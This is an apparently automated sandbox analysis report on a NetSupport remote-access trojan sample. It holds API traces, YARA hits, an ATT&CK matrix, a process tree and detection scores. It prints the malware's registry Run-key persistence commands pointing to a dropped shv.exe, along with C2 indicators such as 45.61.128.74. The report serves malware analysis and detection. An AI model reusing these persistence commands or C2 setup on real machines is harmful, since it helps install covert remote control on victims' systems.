Source: shv.exe, 00000005.00000002.4131206311.0000000000B3E000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132118742.00000000037C6000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4131206311.0000000000C15000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: TCCTL32.DLL.0.dr | Binary or memory string: VMWare
Source: shv.exe, 00000008.00000002.1693805222.00000000004C0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000008.00000003.1693622715.00000000004BD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: shv.exe, 00000009.00000003.1804917331.0000000000C4F000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 0000000B.00000003.1885767916.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: shv.exe, 0000000E.00000003.1967618467.00000000007AF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllzz
Source: C:\Users\Public\Netstat\shv.exe | API call chain: ExitProcess graph end node (graph_5-54375)
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FE1B76D8
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,5_2_11147750
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,5_2_11029590
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1C0D20 GetProcessHeap,0_2_00007FF6FE1C0D20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B76D8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FE1B76D8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B3354 SetUnhandledExceptionFilter,0_2_00007FF6FE1B3354
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B2510 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF6FE1B2510
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B3170 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF6FE1B3170
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,5_2_11093080
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,5_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,8_2_11093080
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,8_2_110310C0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_11161D01
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1116DD89
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,5_2_110F4560
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1AB190
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,5_2_1111FCA0
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\reg.exe REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Users\Public\Netstat\shv.exe C:\Users\Public\Netstat\shv.exe
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,5_2_1109E190
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,5_2_1109E910
Source: file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Shell_TrayWnd
Source: shv.exe, shv.exe, 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp | Binary or memory string: Progman
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE19DC70 cpuid 0_2_00007FF6FE19DC70
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoW,GetNumberFormatW,0_2_00007FF6FE1AA2CC
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,5_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,5_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe | Code function: GetLocaleInfoA,5_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,5_2_11173933
Source: C:\Users\Public\Netstat\shv.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,5_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,5_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,5_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,8_2_11173D69
Source: C:\Users\Public\Netstat\shv.exe | Code function: GetLocaleInfoA,8_2_1116B38E
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,8_2_11173933
Source: C:\Users\Public\Netstat\shv.exe | Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,8_2_111739DA
Source: C:\Users\Public\Netstat\shv.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_1117383E
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,8_2_11173A35
Source: C:\Users\Public\Netstat\shv.exe | Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11173D2D
Source: C:\Users\Public\Netstat\shv.exe | Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,8_2_11173C06
Source: C:\Users\Public\Netstat\shv.exe | Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,8_2_11173CC6
Source: C:\Users\Public\Netstat\shv.exe | Queries volume information: C:\ VolumeInformation (11 identical entries)
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,5_2_110F33F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE1B0754 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,MapViewOfFile,UnmapViewOfFile,CloseHandle,SetEnvironmentVariableW,GetLocalTime,swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,OleUninitialize,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF6FE1B0754
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,5_2_1103B160
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,8_2_11174AE9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00007FF6FE194EB0 GetVersionExW,0_2_00007FF6FE194EB0
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,5_2_11070090
Source: C:\Users\Public\Netstat\shv.exe | Code function: 5_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,5_2_110D8200
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,8_2_11070090
Source: C:\Users\Public\Netstat\shv.exe | Code function: 8_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,8_2_110D8200
Source: Yara match | File source: 5.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.shv.exe.73af0000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.shv.exe.6e540000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.3.file.exe.1afa5756820.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.73af0000.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.6e540000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.0.shv.exe.f00000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.111b79e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.shv.exe.6cd70000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 11.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 9.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 8.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.shv.exe.11000000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match | File source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 6336, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 3492, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 7008, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 6340, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: shv.exe PID: 3244, type: MEMORYSTR
Source: Yara match | File source: C:\Users\Public\Netstat\shv.exe, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\pcicapi.dll, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\PCICHEK.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\TCCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\HTCTL32.DLL, type: DROPPED
Source: Yara match | File source: C:\Users\Public\Netstat\PCICL32.DLL, type: DROPPED
MITRE ATT&CK matrix (one row per line; a leading number is the count of report signatures mapped to that technique):

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | 2 Valid Accounts | 1 Windows Management Instrumentation | 1 Scripting | 1 Exploitation for Privilege Escalation | 1 Deobfuscate/Decode Files or Information | 1 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 4 Native API | 1 DLL Side-Loading | 1 DLL Side-Loading | 3 Obfuscated Files or Information | LSASS Memory | 1 Account Discovery | Remote Desktop Protocol | 1 Screen Capture | 22 Encrypted Channel | Exfiltration Over Bluetooth | 1 Defacement
Email Addresses | DNS Server | Domain Accounts | 1 Command and Scripting Interpreter | 2 Valid Accounts | 2 Valid Accounts | 2 Software Packing | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Input Capture | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 Service Execution | 1 Windows Service | 21 Access Token Manipulation | 1 DLL Side-Loading | NTDS | 44 System Information Discovery | Distributed Component Object Model | 3 Clipboard Data | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | 1 Registry Run Keys / Startup Folder | 1 Windows Service | 1 Masquerading | LSA Secrets | 141 Security Software Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 13 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | 1 Registry Run Keys / Startup Folder | 1 Modify Registry | DCSync | 1 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Virtualization/Sandbox Evasion | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 21 Access Token Manipulation | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 13 Process Injection | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Behavior Graph (ID: 1562378, sample: file.exe, start date: 25/11/2024, architecture: WINDOWS, score: 92)

Signatures on the sample: Suricata IDS alerts for network traffic; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 4 other signatures
Contacted domain: geo.netsupportsoftware.com

file.exe (started; 1 registry value and 17 files created)
  dropped: C:\Users\Public\Netstat\shv.exe, PE32
  dropped: C:\Users\Public\Netstat\remcmdstub.exe, PE32
  dropped: C:\Users\Public\Netstat\pcicapi.dll, PE32
  dropped: 6 other files (3 malicious)
  -> cmd.exe (started)
       signature: Uses cmd line tools excessively to alter registry or file data
       -> shv.exe (started)
            network: 45.61.128.74, 443, 49730, M247GB, United States
            network: geo.netsupportsoftware.com 104.26.1.231, 49731, 80, CLOUDFLARENETUS, United States
            signatures: Multi AV Scanner detection for dropped file; Contains functionality to change the wallpaper; Delayed program exit found
       -> shv.exe (started)
       -> conhost.exe (started)
       -> 4 other processes
shv.exe (started)
shv.exe (started)
shv.exe (started)

Source | Detection | Scanner | Label | Link
file.exe | 39% | ReversingLabs | Win64.Trojan.NetSupport |

Source | Detection | Scanner | Label | Link
C:\Users\Public\Netstat\HTCTL32.DLL | 3% | ReversingLabs | |
C:\Users\Public\Netstat\PCICHEK.DLL | 3% | ReversingLabs | |
C:\Users\Public\Netstat\PCICL32.DLL | 12% | ReversingLabs | |
C:\Users\Public\Netstat\TCCTL32.DLL | 3% | ReversingLabs | |
C:\Users\Public\Netstat\msvcr100.dll | 0% | ReversingLabs | |
C:\Users\Public\Netstat\pcicapi.dll | 3% | ReversingLabs | |
C:\Users\Public\Netstat\remcmdstub.exe | 13% | ReversingLabs | |
C:\Users\Public\Netstat\shv.exe | 29% | ReversingLabs | Win32.Trojan.NetSupport |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://45.61.128.74/fakeurl.htm | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
geo.netsupportsoftware.com | 104.26.1.231 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://45.61.128.74/fakeurl.htm | true | Avira URL Cloud: safe | unknown
http://geo.netsupportsoftware.com/location/loca.asp | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.pci.co.uk/support | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr | false | | high
http://%s/testpage.htmwininet.dll | file.exe, 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr | false | | high
http://geo.netsupportsoftware.com/location/loca.asp$ | shv.exe, 00000005.00000002.4131206311.0000000000B9F000.00000004.00000020.00020000.00000000.sdmp | false | | high
